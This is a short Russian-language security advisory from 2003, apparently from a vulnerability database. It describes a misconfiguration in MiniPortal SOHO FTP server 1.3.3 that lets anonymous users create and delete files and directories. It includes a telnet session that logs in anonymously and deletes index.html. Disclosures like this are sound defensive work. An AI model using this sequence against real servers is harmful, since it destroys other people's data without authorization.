Security Lab

Создание и удаление произвольных каталогов и файлов в MiniPortal SOHO server

Дата публикации:04.04.2003
Всего просмотров:1639
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Уязвимость конфигурации обнаружена в MiniPortal SOHO server. Удаленный авторизованный пользователь, включая анонимного пользователя, может создавать и удалять каталоги и файлы внутри FTP директории. Пример:
>>Telnet 127.0.0.1 21
220 FTP Server, ready
>> USER anonymous
331 Password required
>> PASS anonymous@localhost
230 User logged in
>>MKD test
257 "test" created
>>RMD test
200 Okay
>>DELE index.html
200 Okay
Уязвимость обнаружена в MiniPortal SOHO FTP Server 1.3.3
Ссылки: MiniPortal